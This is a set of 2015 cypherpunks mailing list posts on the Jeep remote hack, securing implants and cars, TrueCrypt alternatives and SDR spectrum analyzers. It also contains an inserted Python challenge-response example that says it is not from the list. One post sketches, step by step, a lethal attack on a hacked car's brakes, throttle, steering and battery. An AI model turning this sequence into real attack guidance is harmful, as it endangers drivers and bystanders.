Name: not available Type: text/html Size: 3643 bytes Desc: not available URL: From coderman at gmail.com Sat Jul 25 06:03:52 2015 From: coderman at gmail.com (coderman) Date: Sat, 25 Jul 2015 06:03:52 -0700 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <20150725123347.GC2556@sivokote.iziade.m$> References: <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> <55B29F01.7050105@m-o-o-t.org> <55B2A77D.4020009@riseup.net> <20150725104404.GB2556@sivokote.iziade.m$> <20150725123347.GC2556@sivokote.iziade.m$> Message-ID: On 7/25/15, Georgi Guninski wrote: > ... > Do you mean for additional ownage one needs network sploits? correct. like cell site simulators which put you in the data path. > Is Sprint's network equipment up to date and safe? > (Having in mind Cisco/BGP and the like we doubt it) they peer differently than most, out of Kansas. it's kinda weird :) also more secure than most, so i suspect the next weak link is GSM... best regards, From l at odewijk.nl Fri Jul 24 14:07:20 2015 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Sat, 25 Jul 2015 06:07:20 +0900 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <55B2A235.5010609@cathalgarvey.me> References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> <55B2A235.5010609@cathalgarvey.me> Message-ID: 2015-07-25 5:38 GMT+09:00 Cathal Garvey : > Without getting into the issue of whether patents encourage innovation.. I > do think that medical devices are a special case. If you have a heart > implant, that thing needs to be "unhackable", but also totally verifiably > safe. 
So there should be firmware signing, no mutable state, verifiable > memory safety...but the code should be open source, and if need be the > firmware signing key for each device (needs to be different for each > device!) should be accessible by a legitimate owner. > > So, no more remote-hackable heart implants, but doctors and cardiac > technicians can still apply critical patches and inspect the source for > sanity. > Why should a heart implant be different than a car? Because there's experts involved? There's always experts involved! Because it's so life critical? It's always "so life critical"! Legally difficult is the differences between "owner" and "user". I think whomever actually uses the device should be the one to be able to hack it. That includes leases, rents, corporate ownership, and everything else. "I drive it, I decide the software it runs". This follows from the idea that "the software's choices are my choices" - in case of such direct life affectors that choice should never be taken away. It's funny; I think this evolved into an equivalent of the "forced inoculation" argument... There's some point to be made for experts truly knowing better, and nobody having any reason to go against the experts' opinions. I think that, in that case, any rational person should be able to reach that same conclusion. If they don't, well, that's a more general problem to be approached separately. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2307 bytes Desc: not available URL: From coderman at gmail.com Sat Jul 25 06:32:45 2015 From: coderman at gmail.com (coderman) Date: Sat, 25 Jul 2015 06:32:45 -0700 Subject: Poitras joins Roark in pro se solidarity In-Reply-To: References: Message-ID: On 7/25/15, John Young wrote: > USG may use Poitras suit to try Snowden absentia as well as to > suppress withholders of his slow dripping public dump. innocent in absentia imply a return, then? 
:) suppression already in place; chance to un-logjam FOIA with precedent worth pursuing. best regards, From cathalgarvey at cathalgarvey.me Fri Jul 24 23:15:09 2015 From: cathalgarvey at cathalgarvey.me (Cathal (Phone)) Date: Sat, 25 Jul 2015 07:15:09 +0100 Subject: True Crypt is Not Secure In-Reply-To: <55B2D4FC.3040805@riseup.net> References: <55B2D4FC.3040805@riseup.net> Message-ID: <81506925-A27A-4924-8B9C-AD7BE5BACEC7@cathalgarvey.me> I've used zuluCrypt a few times, which I recall building with TC-play, works great for vanilla containers at least and has a GUI at least as good as TrueCrypt itself. On 25 July 2015 01:14:52 GMT+01:00, odinn wrote: >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >I thought that this was already answered long ago... but it keeps >getting brought up from time to time. > >For what I consider to be the definitive answer on why you should not >use TrueCrypt and what alternatives to it are, see: > >http://grugq.tumblr.com/post/60464139008/alternative-truecrypt-implement >ations > >Note that from TAILS 1.0.1 they incorporated LUKS, and I recommend >cryptsetup, the "Swiss Army Knife of Disk Encryption." In any event, >you'll definitely want to check out this: >https://github.com/bwalex/tc-play > >Should be helpful. > >- -O > > > >On 07/24/2015 07:46 AM, Yush Bhardwaj wrote: >> BitLocker is better or I should try something else ? 
>> >> WARNING: Using TrueCrypt is not secure >> >> >> >http://krebsonsecurity.com/2014/05/true-goodbye-using-truecrypt-is-not >- -secure/ >> >> http://truecrypt.sourceforge.net/ /* */ /* */ /* */ /* */ /* */ >> /* */ /*Yush Bhardwaj*/ >> > >- -- >http://abis.io ~ >"a protocol concept to enable decentralization >and expansion of a giving economy, and a new social good" >https://keybase.io/odinn >-----BEGIN PGP SIGNATURE----- >Version: GnuPG v1 > >iQEcBAEBAgAGBQJVstT8AAoJEGxwq/inSG8C1OcH/1NWAA7Kmzqz5CcYs40j3Oe8 >v19Wpvn6QzlqFwNxdFvxSV4c8QWUDdCtD+XBoAVby65lsDwm9x+Nd3ka0fEEep0a >ssJHeeHHrNE7V7ijL8gWdZOGH9fa6mNjIEXFuRCywCaMahidBJZnq3UjTJwZ5y/T >avUXmwuM1mOx/Fv9YUMch0QTVs4qMtVacECH6TCvOcXRoCzznvP+L4JESy7Pybd3 >la9TD2c/lAdfJriAsu0iBqInq7hv3ssz/RMif6hoR146edSdT3KxM18siGAEejIN >A0PJGF2nTC+YH15PUEjndvFxq6sG11kBzBp3b7F8jX1/YJZhmA+0J/iNHLhOV8Q= >=MQer >-----END PGP SIGNATURE----- -- Sent from my Android device with K-9 Mail. Please excuse my brevity. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2991 bytes Desc: not available URL: From guninski at guninski.com Fri Jul 24 22:45:05 2015 From: guninski at guninski.com (Georgi Guninski) Date: Sat, 25 Jul 2015 08:45:05 +0300 Subject: Hackers Remotely Kill a Jeep on the Highway In-Reply-To: <1725354647.2377948.1437776420870.JavaMail.yahoo@mail.yahoo.com> References: <55B2A235.5010609@cathalgarvey.me> <1725354647.2377948.1437776420870.JavaMail.yahoo@mail.yahoo.com> Message-ID: <20150725054505.GA2556@sivokote.iziade.m$> On Fri, Jul 24, 2015 at 10:20:20PM +0000, jim bell wrote: > > It should be fairly simple to protect against heart-implant hacks.  First, communication with them is probably limited to inductively-coupled signalling, at a fairly high level.  
> Secondly, it should be based on a two-way challenge/response system: The external device signals a code, call it a password, to which the implant would respond with a reply, which itself includes a randomized code. The external device reads that randomized code, processes it in some way (presumably a hash), and retransmits it to the implant. Only if the implanted device receives what it considers the correct code, would it allow further manipulation. Presumably, any attempt to illegitimately access such a device wouldn't be close enough to read the implant's reply signals, and thus couldn't proceed further.
> "Do you have a match?". "No, but I have a lighter". "Even better". "Until they go wrong".
>
> Jim Bell

IMHO even if you get perfect info security (which is impossible), this will be just a small step.

Humans are screwing the climate and the food with dangerous food supplements. In the long term this might extinguish humans in its present form.

Heard that in Australia skin cancer is major concern, closely related to the Sun and there a lot of food supplements (locally we call them "E"-s) are forbidden by law.

I deny being green, but judge for yourself.

From jya at pipeline.com Sat Jul 25 06:11:50 2015
From: jya at pipeline.com (John Young)
Date: Sat, 25 Jul 2015 09:11:50 -0400
Subject: Poitras joins Roark in pro se solidarity
In-Reply-To:
References:
Message-ID:

USG may use Poitras suit to try Snowden absentia as well as to suppress withholders of his slow dripping public dump.

At 07:49 AM 7/25/2015, you wrote:
>rules of the road:
> http://cryptome.org/2015/07/poitras-003.pdf

From list at sysfu.com Sat Jul 25 12:25:56 2015
From: list at sysfu.com (Seth)
Date: Sat, 25 Jul 2015 12:25:56 -0700
Subject: DMARC report mailing list subscriber address leaks
In-Reply-To: <20150725113747.GD6906@ctrlc.hu>
References: <55B2DD10.7090600@riseup.net> <20150725113747.GD6906@ctrlc.hu>
Message-ID:

On Sat, 25 Jul 2015 04:37:47 -0700, stef wrote:
> On Fri, Jul 24, 2015 at 07:39:59PM -0700, Seth wrote:
>> OK, as requested, here's the first report from fastmail.fm
>
> how many are there in total?

I get a few each day. Mostly from hotmail, fastmail.fm, yahoo.com and google. Think I saw one from xs4all too but it didn't climb over ye olde greylisting wall.

> can you post this in some less fuckd up way than this copypaste crap?
> are there some urls, that could be simply curled for example?

I heard you screamin', the copypasta was extremely lame, I'm forwarding to Shelley who volunteered to perform proper text processing/formatting after which the extracted contents will be posted to the list.

From yushbhardwaj91 at gmail.com Sat Jul 25 00:04:41 2015
From: yushbhardwaj91 at gmail.com (Yush Bhardwaj)
Date: Sat, 25 Jul 2015 12:34:41 +0530
Subject: True Crypt is Not Secure
In-Reply-To: <81506925-A27A-4924-8B9C-AD7BE5BACEC7@cathalgarvey.me>
References: <55B2D4FC.3040805@riseup.net> <81506925-A27A-4924-8B9C-AD7BE5BACEC7@cathalgarvey.me>
Message-ID:

After a little search and reading your replies, VeraCrypt for windows and Tomb for debian looks good to me.

*Yush Bhardwaj*

From yushbhardwaj91 at gmail.com Sat Jul 25 00:12:33 2015
From: yushbhardwaj91 at gmail.com (Yush Bhardwaj)
Date: Sat, 25 Jul 2015 12:42:33 +0530
Subject: True Crypt is Not Secure
In-Reply-To:
References: <55B2D4FC.3040805@riseup.net> <81506925-A27A-4924-8B9C-AD7BE5BACEC7@cathalgarvey.me>
Message-ID:

I am sorry forgot to say Thank You guys

*Yush Bhardwaj*

From Rayzer at riseup.net Sat Jul 25 13:05:01 2015
From: Rayzer at riseup.net (Razer)
Date: Sat, 25 Jul 2015 13:05:01 -0700
Subject: Hackers Remotely Kill a Jeep on the Highway
In-Reply-To: <55B2F380.9060806@pilobilus.net>
References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B2CE54.8020301@riseup.net> <55B2F380.9060806@pilobilus.net>
Message-ID: <55B3EBED.5060702@riseup.net>

On 07/24/2015 07:25 PM, Steve Kinney wrote:
>
> Need some volunteers and/or a funding angel to create a corpus of
> howto docs that identify the RF receiver parts in automotive ECM
> units and their associated wiring harnesses, including which pins
> to cut to assure radio silence in both directions.

RF sniffers are common electronic equipment. Keychain wireless networks detectors and all that. Just pay attention to where your hands wander attempting to pinpoint the rf source's location, HEI ignition systems, fan belts, whirling parts etc, maim and kill.

I'm reading this discussion with some amusement because I wrote off car ownership and being a 'motorhead' a decade or more ago when the cars wouldn't let you tune them up correctly b/c 'computer'.

RR

From s at ctrlc.hu Sat Jul 25 04:17:53 2015
From: s at ctrlc.hu (stef)
Date: Sat, 25 Jul 2015 13:17:53 +0200
Subject: Hackers Remotely Kill a Jeep on the Highway
In-Reply-To:
References: <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> <55B29F01.7050105@m-o-o-t.org> <55B2A77D.4020009@riseup.net> <20150725104404.GB2556@sivokote.iziade.m$>
Message-ID: <20150725111753.GB6906@ctrlc.hu>

On Sat, Jul 25, 2015 at 03:52:17AM -0700, coderman wrote:
> > extended periods of time to write code" and added manipulating its
> > software "constitutes criminal action".
>
> motherfuckers, did you learn nothing?

no, like every industry first hit by our train.

> this is how not to respond to severe, critical, architectural defects
> in critical systems.
>
> guess auto industry gonna play it ugly.

there was already this news item: "Fiat Chrysler Recalls 1.4 million Cars After Software Bug is Revealed" this is not very sustainable i guess. my bet for their next step is fixing this OTA. m(

--
otr fp: https://www.ctrlc.hu/~stef/otr.txt

From s at ctrlc.hu Sat Jul 25 04:37:47 2015
From: s at ctrlc.hu (stef)
Date: Sat, 25 Jul 2015 13:37:47 +0200
Subject: DMARC report mailing list subscriber address leaks
In-Reply-To:
References: <55B2DD10.7090600@riseup.net>
Message-ID: <20150725113747.GD6906@ctrlc.hu>

On Fri, Jul 24, 2015 at 07:39:59PM -0700, Seth wrote:
> OK, as requested, here's the first report from fastmail.fm

how many are there in total?

can you post this in some less fuckd up way than this copypaste crap?
are there some urls, that could be simply curled for example?
thx,s

--
otr fp: https://www.ctrlc.hu/~stef/otr.txt

From guninski at guninski.com Sat Jul 25 03:44:04 2015
From: guninski at guninski.com (Georgi Guninski)
Date: Sat, 25 Jul 2015 13:44:04 +0300
Subject: Hackers Remotely Kill a Jeep on the Highway
In-Reply-To: <55B2A77D.4020009@riseup.net>
References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> <55B29F01.7050105@m-o-o-t.org> <55B2A77D.4020009@riseup.net>
Message-ID: <20150725104404.GB2556@sivokote.iziade.m$>

On Fri, Jul 24, 2015 at 02:00:45PM -0700, Razer wrote:
>
> From offlist:
>
> On 07/24/2015 01:24 PM, Peter Fairbrother wrote:
> > Fiat Chrysler recalls 1.4 million cars after Jeep hack
> >
> > http://www.bbc.co.uk/news/technology-33650491
>

Thanks.

The link appears to contradict wired's claim of "wireless exploit", possibly because they are covering their corporate asses.

Fiat Chrysler said exploiting the flaw "required unique and extensive technical knowledge, prolonged physical access to a subject vehicle and extended periods of time to write code" and added manipulating its software "constitutes criminal action".

"prolonged physical access to a subject vehicle" isn't remote.

Is the jeep sploit remote or not?

"time to write code" doesn't make sense to me once you have written it.
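The two-way challenge/response that jim bell outlines earlier in this thread (quoted in Georgi Guninski's reply), written out as an added example; it is not code from any list participant. It assumes the "hash" step is an HMAC under a per-device key, which the post does not specify, and every name in it (`Implant`, `keyed_response`, `LABEL`) is made up for illustration. The scenarios show why the key and a single-use nonce matter even when a listener can hear both directions.

```python
import hashlib
import hmac
import secrets

# Constructed domain-separation label (assumption, not from the thread).
LABEL = b"implant-auth-v1"


def keyed_response(device_key: bytes, nonce: bytes) -> bytes:
    """Programmer side: HMAC over the implant's random challenge."""
    return hmac.new(device_key, LABEL + nonce, hashlib.sha256).digest()


def unkeyed_response(nonce: bytes) -> bytes:
    """A bare hash of the challenge: computable by anyone who hears the nonce."""
    return hashlib.sha256(nonce).digest()


class Implant:
    """Verifier side: one per-device key, one outstanding challenge at a time."""

    def __init__(self, device_key: bytes) -> None:
        self._key = device_key
        self._pending = None      # nonce awaiting a response, or None
        self.unlocked = False

    def challenge(self) -> bytes:
        # A new session always starts locked and with a fresh random nonce.
        self.unlocked = False
        self._pending = secrets.token_bytes(16)
        return self._pending

    def verify(self, response: bytes) -> bool:
        # Consume the nonce before comparing, so each challenge is single use.
        nonce, self._pending = self._pending, None
        self.unlocked = nonce is not None and hmac.compare_digest(
            keyed_response(self._key, nonce), response
        )
        return self.unlocked


def run_scenarios() -> dict:
    """Run the exchange once legitimately, then four failure cases."""
    key = secrets.token_bytes(32)          # constructed per-device key
    implant = Implant(key)
    results = {}

    # 1. Legitimate programmer holding the device key.
    nonce = implant.challenge()
    captured = keyed_response(key, nonce)  # what a listener would record
    results["legitimate"] = implant.verify(captured)

    # 2. Listener replays the recorded response against a fresh challenge.
    implant.challenge()
    results["replay"] = implant.verify(captured)

    # 3. Response sent with no challenge outstanding.
    results["no_challenge"] = implant.verify(captured)

    # 4. Response built from a plain hash of the nonce, no secret involved.
    nonce = implant.challenge()
    results["unkeyed_hash"] = implant.verify(unkeyed_response(nonce))

    # 5. Valid protocol, but the key belongs to a different device.
    nonce = implant.challenge()
    other_key = secrets.token_bytes(32)
    results["other_device_key"] = implant.verify(keyed_response(other_key, nonce))

    return results


if __name__ == "__main__":
    for name, accepted in run_scenarios().items():
        print(f"{name:18s} accepted={accepted}")
```

Only the first scenario unlocks the device; the security rests on the key and the fresh nonce rather than on the listener being out of radio range.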
From coderman at gmail.com Sat Jul 25 13:46:33 2015
From: coderman at gmail.com (coderman)
Date: Sat, 25 Jul 2015 13:46:33 -0700
Subject: Hackers Remotely Kill a Jeep on the Highway
In-Reply-To: <55B2CE54.8020301@riseup.net>
References: <20150724120211.GA2562@sivokote.iziade.m$> <14ec0294ce8.276e.4d489027c0c4d0c1b1ca03a1f48f1ffb@misanthropia.org> <20150724130438.4E76DC00014@frontend1.nyi.internal> <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B2CE54.8020301@riseup.net>
Message-ID:

On 7/24/15, M373 wrote:
> It's not a matter of credulity in believing that authorities would carry
> out such an assassination, the problem is asserting such an act without
> direct evidence. As I said, and as insider Richard Clarke said, it would
> be difficult to show.

this came up in a separate context, so thought experiment:

let's assume a rogue contractor, not US establishment in any official manner is our hypothetical malicious actor in this situation. let's assume they acted to maximize effectiveness at the expense of identifying characteristics.

let's construct a scenario for replay in situ to compare? dialed to MAX DEATH! [ not s t e a l t h . . . ]

---

2013 Mercedes, through MBRACE hack you attain full authority over:
- Central Control Module (CCM)
- Central Timing Module (CTM)
- Electronic/engine Control Module (ECM)
- Engine control unit (ECU)
- Powertrain Control Module (PCM)
- Transmission Control Module (TCM)
- Speed control unit (SCU)
- Brake Control Module (BCM or EBCM)
- Vehicle Control Module (VCM) Electronic Powersteering (EPS)
- General Electronic Module (GEM)
- Body Control Module (BCM)
- Suspension Control Module (SCM)
- Telematic control unit (TCU)
- Battery management system

begin attack!>>

0. ... delay tipping until target location, speed, orientation RDY ...
1. EBCM disable, zero halt
2. PCM fix in mid gear, prep to redline
3. ECM throttle position to maximum
4. VCM EPS to remote drive override, E.g. swerve to target
5. SCU, TCU monitor for rapid deceleration then, immediately:
5a. ECM fuel pumps to max flow rate
5b. GEM set all lights, indicators, fans, servos, etc. to ON
5c. Battery management system destructively short discharge [ AKA, incendiary mode ]

now compare this collision with expected outcomes of human at the wheel using normative controls.

best regards,
codermange who love his '67 Chevy C20 long bed farm truck more each day :)

From guninski at guninski.com Sat Jul 25 05:33:47 2015
From: guninski at guninski.com (Georgi Guninski)
Date: Sat, 25 Jul 2015 15:33:47 +0300
Subject: Hackers Remotely Kill a Jeep on the Highway
In-Reply-To:
References: <20150724165218.GD2562@sivokote.iziade.m$> <55B2734F.2010904@riseup.net> <55B29597.1090706@riseup.net> <55B29F01.7050105@m-o-o-t.org> <55B2A77D.4020009@riseup.net> <20150725104404.GB2556@sivokote.iziade.m$>
Message-ID: <20150725123347.GC2556@sivokote.iziade.m$>

On Sat, Jul 25, 2015 at 03:58:48AM -0700, coderman wrote:
> On 7/25/15, coderman wrote:
> >...
>
> two points of clarification:
>
> 1. there is assumption that information is silo'ed, also cannot be shared. not!
>
> 2. the difficulty regarding SprintPCS is that their lease space spans class A's.
> see https://peertech.org/files/cidr-privacy-space-cell-data-2009.txt
> for a unique set sample across five devices for a month in a
> particular configuration at a single tower. for example.
>
> this is why the mandatory Sprint block was actually an unconventional
> but exceptionally effective mitigation for this path to remote
> control.
>
>
> best regards,

Do you mean for additional ownage one needs network sploits?

Is Sprint's network equipment up to date and safe?
(Having in mind Cisco/BGP and the like we doubt it)

From s at ctrlc.hu Sat Jul 25 12:40:03 2015
From: s at ctrlc.hu (stef)
Date: Sat, 25 Jul 2015 21:40:03 +0200
Subject: DMARC report mailing list subscriber address leaks
In-Reply-To:
References: <55B2DD10.7090600@riseup.net> <20150725113747.GD6906@ctrlc.hu>
Message-ID: <20150725193959.GE6906@ctrlc.hu>

On Sat, Jul 25, 2015 at 12:25:56PM -0700, Seth wrote:
> On Sat, 25 Jul 2015 04:37:47 -0700, stef wrote:
> >can you post this in some less fuckd up way than this copypaste crap?
> >are there some urls, that could be simply curled for example?
>
> I heard you screamin', the copypasta was extremely lame, I'm forwarding to
> Shelley who volunteered to perform proper text processing/formatting after
> which the extracted contents will be posted to the list.

thanks :)

--
otr fp: https://www.ctrlc.hu/~stef/otr.txt

From jdb10987 at yahoo.com Sat Jul 25 18:06:12 2015
From: jdb10987 at yahoo.com (jim bell)
Date: Sun, 26 Jul 2015 01:06:12 +0000 (UTC)
Subject: Hackers Remotely Kill a Jeep on the Highway
In-Reply-To: <55B3EBED.5060702@riseup.net>
References: <55B3EBED.5060702@riseup.net>
Message-ID: <270760644.2684776.1437872772106.JavaMail.yahoo@mail.yahoo.com>

From: Razer
On 07/24/2015 07:25 PM, Steve Kinney wrote:
>
> Need some volunteers and/or a funding angel to create a corpus of
> howto docs that identify the RF receiver parts in automotive ECM
> units and their associated wiring harnesses, including which pins
> to cut to assure radio silence in both directions.

RF sniffers are common electronic equipment. Keychain wireless networks detectors and all that. Just pay attention to where your hands wander attempting to pinpoint the rf source's location, HEI ignition systems, fan belts, whirling parts etc, maim and kill.

There are some rather economical spectrum analyzers being sold today. Example:
http://www.triarchytech.com/?gclid=Cj0KEQjw58ytBRDMg-HVn4LuqasBEiQAhPkhuqJwqFbZdZZCT5H96z3jdwFEddz79Kx-HDL_DEqJCrYaAmko8P8HAQ
http://www.flyteccomputers.com/Spectrum-Analyzer
http://nutsaboutnets.com/rfviewer/
http://www.ebay.com/itm/USB-RF-Spectrum-Analyzer-3-3GHZ-/281757383569

Some of the devices I've seen advertised may only be WiFi-signal capable. Somebody doing this work seriously should probably get a full-spectrum unit, from low-tens-of-megahertz to 5 GHz or so.

Of course, there is this:
http://www.ebay.com/itm/Tektronix-494P-Tek-Spectrum-Analyzer-with-Cover-Works-GPIB-Tested-and-Works-/291518180539?pt=LH_DefaultDomain_0&hash=item43dfd66cbb

Ironically, the newer, cheaper units may be much better for your task, in part because the USB spectrum analyzers can be put on the end of a USB cable, and they therefore interface directly with modern computers.

Jim Bell

From wirelesswarrior at safe-mail.net Sun Jul 26 10:51:38 2015
From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net)
Date: Sun, 26 Jul 2015 13:51:38 -0400
Subject: Intercept receivers (was Re: Hackers Remotely Kill a Jeep on the Highway)
Message-ID:

-------- Original Message --------
From: Peter Gutmann
Apparently from: cypherpunks-bounces at cpunks.org
To: jdb10987 at yahoo.com
Cc: cypherpunks at cpunks.org
Subject: Re: Hackers Remotely Kill a Jeep on the Highway
Date: Sun, 26 Jul 2015 21:42:14 +1200

> jim bell writes:
>
> >There are some rather economical spectrum analyzers being sold today.
>
> You have to be careful with those, the straight USB-dongle ones are going to
> be SDR-based, typically the RTL820T meant for DVB-T use (and re-purposed by
> half the hacking world for all manner of other things), then you have the USB-
> interface ones with more powerful SDRs, and finally you've got purpose-built
> spectrum analysers. Compared to the real thing, you're going to run into
> severely limited bandwidth (anything that spreads the signal across a wide
> spectrum is going to be difficult to impossible to deal with), and not-so-
> spectacular signal handling (there's a reason why the real thing costs
> thousands of dollars).
>
> That's not to say that they're no good, just that you need to be aware that
> you're getting what you pay for. If you've got a specific purpose in mind,
> check first that whatever you're getting will be able to do the job. There's
> quite a bit of material out there on this, google something like "sdr spectrum
> analyzer" to find articles on it.
>
> Peter.

Achieving receivers and spectrum analyzers with wide frequency coverage, high dynamic range and wide bandwidths (with very low noise circuitry, stable local oscillators, etc.) simultaneously has, up till recently, demanded very high prices. That's why few outside of governments, corporations and well-funded professionals could afford them. However, with the rapid growth and falling prices of SDR this has and is changing. For example, Ettus' USRPs, covering VHF to 6 GHz or so, starting under $1000, that not long ago were in the $10,000s. The HackRF (which some have complained is little more than an IF strip) effectively covering down to below 10 MHz is only $300 (though its performance, due to only 8-bit ADC, is not in the same league as the 16-bit USRPs). If some hardware hacker were to deliver a 14-16 bit ADC daughter board (there are affordable chips offering up to 60M samples/sec) for the HackRF (it is provisioned to accept one) it could substantially improve its use.
WW From wirelesswarrior at safe-mail.net Sun Jul 26 11:21:10 2015 From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net) Date: Sun, 26 Jul 2015 14:21:10 -0400 Subject: SIGINT and improving wireless privacy at the PHY Message-ID: I will be co-presenting a paper, with Ettus' Balint Seeber, at Defcon 23 (Balint will also be presenting a separate, coordinated, paper). http://www.wirelessvillage.ninja/speakersched.html WW From coderman at gmail.com Sun Jul 26 17:04:36 2015 From: coderman at gmail.com (coderman) Date: Sun, 26 Jul 2015 17:04:36 -0700 Subject: SIGINT and improving wireless privacy at the PHY In-Reply-To: References: Message-ID: On 7/26/15, wirelesswarrior at safe-mail.net wrote: > I will be co-presenting a paper, with Ettus' Balint Seeber, at Defcon 23 > (Balint will also be presenting a separate, coordinated, paper). > > http://www.wirelessvillage.ninja/speakersched.html looking forward to it! this is the active front of communication availability and privacy... From jya at pipeline.com Sun Jul 26 15:38:07 2015 From: jya at pipeline.com (John Young) Date: Sun, 26 Jul 2015 18:38:07 -0400 Subject: Varoufakis claims had approval to plan parallel banking system for Greece Message-ID: Varoufakis claims had approval to plan parallel banking system for Greece http://www.ekathimerini.com/199945/article/ekathimerini/news/varoufakis-claims-had-approval-to-plan-parallel-banking-system Allegedly aided by Columbia University IT professor to design a hack of existing taxation systems. 
Columbia Computer Science Faculty

http://www.cs.columbia.edu/people/faculty

From admin at pilobilus.net Sun Jul 26 15:52:03 2015
From: admin at pilobilus.net (Steve Kinney)
Date: Sun, 26 Jul 2015 18:52:03 -0400
Subject: Hackers Remotely Kill a Jeep on the Highway
In-Reply-To: <270760644.2684776.1437872772106.JavaMail.yahoo@mail.yahoo.com>
References: <55B3EBED.5060702@riseup.net> <270760644.2684776.1437872772106.JavaMail.yahoo@mail.yahoo.com>
Message-ID: <55B56493.7020603@pilobilus.net>

On 07/25/2015 09:06 PM, jim bell wrote:
> *From:* Razer On 07/24/2015 07:25 PM, Steve
> Kinney wrote:
>
>
>>
>> Need some volunteers and/or a funding angel to create a
>> corpus of howto docs that identify the RF receiver parts in
>> automotive ECM units and their associated wiring harnesses,
>> including which pins to cut to assure radio silence in both
>> directions.
>
> RF sniffers are common electronic equipment. Keychain wireless
> networks detectors and all that. Just pay attention to where
> your hands wander attempting to pinpoint the rf source's
> location, HEI ignition systems, fan belts , whirling parts etc,
> maim and kill.

[ ... ]

Any bench tech with access to publicly available documentation - and the physical hardware - should be able to identify the RF components in any automotive control system without too much trouble.

ECM units are fairly well RF isolated, so those that talk to the world should normally have easily identified connections to external antennas. High frequency transceiver components usually have their own RF shielded areas on the board as well.

Cutting one wire or IC pin per unit (antenna or IC power) should isolate it from remote access. If necessary functions fail, undo the mod and try elsewhere until the desired results are obtained.

In the U.S., getting hold of ECMs to play with presents some inconveniences: Junk yards pull ECMs and sell them back to their manufacturers - some nonsense about "intellectual property" seems to be involved - so there aren't many available on the open market to play with. But where there's a will, a few dollars and a small pile of pointy tools, there's a way.

:o)

From jason.mcvetta at gmail.com Sun Jul 26 21:01:22 2015
From: jason.mcvetta at gmail.com (Jason McVetta)
Date: Sun, 26 Jul 2015 21:01:22 -0700
Subject: SIGINT and improving wireless privacy at the PHY
In-Reply-To:
References:
Message-ID:

The server at www.wirelessvillage.ninja sez: "Chances are, if you got this page, that means the server doesn't like something about you. You may be using an invalid HTTP option, or an evil browser string, or maybe just from a country we are leery of."

Trying to view using Firefox on Android over Viettel 3G. Are you guys blocking all of Vietnam?

--
sent from my robot

On Jul 27, 2015 1:24 AM, wrote:
> I will be co-presenting a paper, with Ettus' Balint Seeber, at Defcon 23
> (Balint will also be presenting a separate, coordinated, paper).
>
> http://www.wirelessvillage.ninja/speakersched.html
>
> WW
>

From pgut001 at cs.auckland.ac.nz Sun Jul 26 02:42:14 2015
From: pgut001 at cs.auckland.ac.nz (Peter Gutmann)
Date: Sun, 26 Jul 2015 21:42:14 +1200
Subject: Hackers Remotely Kill a Jeep on the Highway
In-Reply-To: <270760644.2684776.1437872772106.JavaMail.yahoo@mail.yahoo.com>
Message-ID:

jim bell writes:

>There are some rather economical spectrum analyzers being sold today.

You have to be careful with those, the straight USB-dongle ones are going to be SDR-based, typically the RTL820T meant for DVB-T use (and re-purposed by half the hacking world for all manner of other things), then you have the USB-interface ones with more powerful SDRs, and finally you've got purpose-built spectrum analysers. Compared to the real thing, you're going to run into severely limited bandwidth (anything that spreads the signal across a wide spectrum is going to be difficult to impossible to deal with), and not-so-spectacular signal handling (there's a reason why the real thing costs thousands of dollars).

That's not to say that they're no good, just that you need to be aware that you're getting what you pay for. If you've got a specific purpose in mind, check first that whatever you're getting will be able to do the job. There's quite a bit of material out there on this, google something like "sdr spectrum analyzer" to find articles on it.

Peter.
From pgut001 at cs.auckland.ac.nz Sun Jul 26 16:25:43 2015
From: pgut001 at cs.auckland.ac.nz (Peter Gutmann)
Date: Sun, 26 Jul 2015 23:25:43 +0000
Subject: Intercept receivers (was Re: Hackers Remotely Kill a Jeep on the Highway)
In-Reply-To:
References:
Message-ID: <9A043F3CF02CD34C8E74AC1594475C73AB070C77@uxcn10-tdc05.UoA.auckland.ac.nz>

wirelesswarrior at Safe-mail.net writes:

>For example, Ettus' USRPs, covering VHF to 6 GHz or so, starting under $1000,
>that not long ago were in the $10,000s. The HackRF (which some have
>complained is little more than an IF strip) effectively covering down to
>below 10 Mhz is only $300 (though its performance, due to only 8-bit ADC, is
>not in the same league as the 16-bit USRPs). If some hardware hacker were to
>deliver a 14-16 bit ADC daughter board (there are affordable chips offering
>up to 60M samples/sec) for the HackRF (it is provisioned to accept one) it
>could substantially improve its use.

The problem with the HackRF (and other USB-based devices) is the bandwidth of the USB connection, it's not that the HackRF hardware can't handle it, it's that you can't get that much data to the PC.

(I have a HackRF - I needed a cheap way to track down some odd RFI issues - and it's a pretty cool piece of hardware for the money, but, as I mentioned earlier, you do get what you're paying for. If I could make a wishlist, it'd be nice to have a rev.2 with some work done on the front-end...).

Peter.
From carimachet at gmail.com Sun Jul 26 20:39:15 2015
From: carimachet at gmail.com (Cari Machet)
Date: Mon, 27 Jul 2015 06:39:15 +0300
